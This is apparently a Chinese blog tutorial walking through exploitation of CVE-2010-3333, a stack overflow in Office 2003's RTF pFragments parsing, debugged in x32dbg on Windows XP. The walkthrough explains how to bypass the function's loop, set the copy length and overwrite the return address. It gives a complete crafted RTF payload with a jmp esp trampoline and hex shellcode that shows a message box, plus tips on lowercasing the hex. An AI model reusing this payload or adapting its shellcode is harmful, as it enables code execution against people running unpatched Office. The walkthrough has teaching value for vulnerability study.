作者:黑蛋
一、漏洞简介
cve-2010-3333是一个Office 2003 的栈溢出漏洞,其原因是在文档中读取一个属性值的时候,没有对其长度验证,导致了一个溢出,看着很简单的一个漏洞,却又有点恶心人。
二、漏洞环境 系统
调试工具
目标程序
16进制编辑器
XP SP3
x32dbg
Microsoft Office 2003
010Editor
三、漏洞分析 首先用msf获取样本:
把我们的样本拖到XP SP3中,用x32dbg附加office 2003,打开样本:
卡在了这里,这是一个字符串拷贝,ESI指向的值拷贝到EDI指向的位置:
我们在这句前面下断点,重新用office 2003打开样本:
卡在了我们断点处:
在这里我们首先可以获取到拷贝长度的值,ECX的值,是:C8AC,我们查看esi的值:
F8运行俩步,走过rep movsd,我们再查看堆栈:
可以看到,ESI地址指向的值已经拷贝到了栈中EBP-10的位置向下。而返回地址在EBP+4的位置,我们已经可以确定淹没返回值的位置了。我们继续F8,但是发现程序跑飞,并没有按照正常流程发展,经过思考,应该是拷贝字符串过长,访问l无法访问的地址,导致异常,所以我们需要减少字符串拷贝长度,也就是异常代码上一句的ECX的值C8AC,直接用010Editor查看样本,很容易发现C8AC:
我们修改为1000,已经够我们用了,试试还会不会异常:
重新附加office2003并打开样本,ECX的值已经变成01000,并且可以不触发异常,正常走下去:
随后我们会发现,并没有出现弹栈返回的情况,观察这段溢出函数:
他并没有开辟新的栈,这里算是这个漏洞第一个恶心点,我们需要继续F8向下运行,直到这个函数返回,也就是执行完拷贝代码下面的第一个ret:
箭头指向的call就是关键call,他没有开辟栈空间,所以还需要向下执行:
F8走过接下来一个call,到了这里:
一直跟,直到返回到EBP+4的地址,结果一直到一个循环里面来回跑(第二个恶心点),我们重新加载,进入前面F8略过得call,下面断点那里:
进来了,继续调试:
结果发现还是进入了之前那个循环,所以继续重新调试,回到第二个call里面,发现里面有个call很关键,导致函数无法返回,进入一个循环:
我们在je这里修改标志位,跳过这个循环call:
然后一直F8,直到一个ret 14:
我们观察堆栈,这里就是我们想要的返回,只要淹没EBP+4的返回值,在这个ret我们就可以跳到shellcode,接下来我们需要观察如何让之前那个je跳转,而不是手动修改标志位,再次加载,回到第二个call(淹没代码ret后第一个call):
点击并拖拽以移动
发现这里EBP+10的值如果是0,就可以进行跳转,经过观察调试,发现这个值来自我们淹没返回值的payload中的某一个位置,所以接下来我们构造我们的payload,直接修改msf生成的样本(注意:所有字母必须全部换成小写):
{\rtf1{\shp{\sp{\sn pFragments}{\sv 7;7;11111111001090909090909090900000000090909090909090901245fa7f9090909090909090909090909090909000000000fc686a0a381e686389d14f683274910c8bf48d7ef433dbb7042be366bb33325368757365725433d2648b5a308b4b0c8b491c8b098b6908ad3d6a0a381e750595ff57f895608b453c8b4c057803cd8b592003dd33ff478b34bb03f5990fbe063ac47408c1ca0703d046ebf13b54241c75e48b592403dd668b3c7b8b591c03dd032cbb955fab57613d6a0a381e75a933db53686666666668666666668bc453505053ff57fc53ff57f8909090900000}}}}
标记1处:这里是拷贝长度,不要太大,会造成异常; 标记2处:这里是跳板jmp esp的地址; 标记3处:这里是00000000,用来让je跳转,不要进入循环call; 标记4处:这里就是弹窗shellcode起始位置; shellcode如下:
FC686A0A381E686389D14F683274910C8BF48D7EF433DBB7042BE366BB33325368757365725433D2648B5A308B4B0C8B491C8B098B6908AD3D6A0A381E750595FF57F895608B453C8B4C057803CD8B592003DD33FF478B34BB03F5990FBE063AC47408C1CA0703D046EBF13B54241C75E48B592403DD668B3C7B8B591C03DD032CBB955FAB57613D6A0A381E75A933DB53686666666668666666668BC453505053FF57FC53FF57F8
接下来用x32dbg附加office2003,打开我们的payload看看情况:
拷贝成功,jmp esp地址成功淹没返回值,接下来观察je那里是否成功:
继续执行,到ret 14后:
成功到了jmp esp处,而esp指向我们的shellcode位置,继续执行,到我们弹窗代码:
F9运行,弹窗成功:
在这里补充一下最后一个恶心点,也是需要注意的地方,就是在构造payload时候,无论是跳板地址,或者我们的弹窗shellcode,都要把所有大写改成小写,否则加载到程序,会识别成其他东西,比如把跳板地址大写:
用office打开并到拷贝代码之前:
这里7FFA4512已经被识别成70004512。后面的弹窗shellcode也是一样。